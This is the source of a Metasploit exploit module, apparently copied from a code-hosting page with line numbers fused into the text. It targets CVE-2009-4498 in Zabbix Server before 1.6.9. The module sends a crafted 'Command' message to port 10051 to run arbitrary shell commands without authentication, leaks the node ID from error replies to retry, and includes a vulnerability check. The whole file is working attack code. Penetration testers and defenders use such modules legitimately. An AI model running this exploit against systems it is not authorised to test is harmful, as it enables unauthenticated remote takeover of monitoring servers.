Path: blob/master/modules/exploits/linux/misc/zabbix_server_exec.rb
19534 views
# encoding: binary12##3# This module requires Metasploit: https://metasploit.com/download4# Current source: https://github.com/rapid7/metasploit-framework5##67class MetasploitModule < Msf::Exploit::Remote8Rank = ExcellentRanking910include Msf::Exploit::Remote::Tcp1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Zabbix Server Arbitrary Command Execution',17'Description' => %q{18This module abuses the "Command" trap in Zabbix Server to execute arbitrary19commands without authentication. By default the Node ID "0" is used, if it doesn't20work, the Node ID is leaked from the error message and exploitation retried.2122According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability23has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.24},25'Author' => [26'Nicob <nicob[at]nicob.net>', # Vulnerability discovery27'juan vazquez' # Metasploit module28],29'License' => MSF_LICENSE,30'References' => [31[ 'CVE', '2009-4498' ],32[ 'OSVDB', '60965' ],33[ 'BID', '37989' ],34[ 'EDB', '10432' ],35[ 'URL', 'https://support.zabbix.com/browse/ZBX-1030' ]36],37'Platform' => ['unix'],38'Arch' => ARCH_CMD,39'Privileged' => false,40'Payload' => {41'DisableNops' => true,42'Compat' =>43{44'PayloadType' => 'cmd',45'RequiredCmd' => 'generic telnet',46# *_perl, *_python and *_ruby work if they are installed47}48},49'Targets' => [50[ 'Zabbix 1.6.7', {} ]51],52'DefaultTarget' => 0,53'DisclosureDate' => 'Sep 10 2009',54'Notes' => {55'Reliability' => UNKNOWN_RELIABILITY,56'Stability' => UNKNOWN_STABILITY,57'SideEffects' => UNKNOWN_SIDE_EFFECTS58}59)60)6162register_options(63[64Opt::RPORT(10051),65]66)67end6869def send_command(sock, node_id, cmd)70host_id = Rex::Text.rand_text_numeric(3)71msg = "Command\255"72msg << "#{node_id}\255"73msg << "#{host_id}\255"74msg << "#{cmd}\n"75sock.put(msg)76res = sock.get_once77return res78end7980def check81peer = "#{rhost}:#{rport}"82node_id = 083clue = Rex::Text.rand_text_alpha(rand(5) + 5)84cmd = "echo #{clue}"8586connect87vprint_status("Sending 'Command' request...")88res = send_command(sock, node_id, cmd)89disconnect9091if res92vprint_status(res)93if res =~ /#{clue}/94return Exploit::CheckCode::Vulnerable95elsif res =~ /-1/ and res =~ /NODE (\d*)/96node_id = $197vprint_good("Node ID #{node_id} discovered")98else99return Exploit::CheckCode::Safe100end101else # No response102return Exploit::CheckCode::Safe103end104105# Retry with the good node_id106connect107vprint_status("Sending 'Command' request with discovered Node ID...")108res = send_command(sock, node_id, cmd)109disconnect110if res and res =~ /#{clue}/111return Exploit::CheckCode::Vulnerable112end113114return Exploit::CheckCode::Safe115end116117def exploit118peer = "#{rhost}:#{rport}"119node_id = 0120cmd = payload.encoded121122connect123print_status("Sending 'Command' request...")124res = send_command(sock, node_id, cmd)125disconnect126127if res and res =~ /-1/ and res =~ /NODE (\d*)/128# Retry with the good node_id129node_id = $1130print_good("Node ID #{node_id} discovered")131connect132print_status("Sending 'Command' request with discovered Node ID...")133res = send_command(sock, node_id, cmd)134disconnect135end136137# Read command output from socket if cmd/unix/generic payload was used138if (datastore['CMD'])139if res and res =~ /\x30\xad/140print_good("Command executed successfully")141print_status("Output:\n#{res.split("\x30\xad").last}")142else143print_error("Failed to execute the command")144end145end146end147end148149150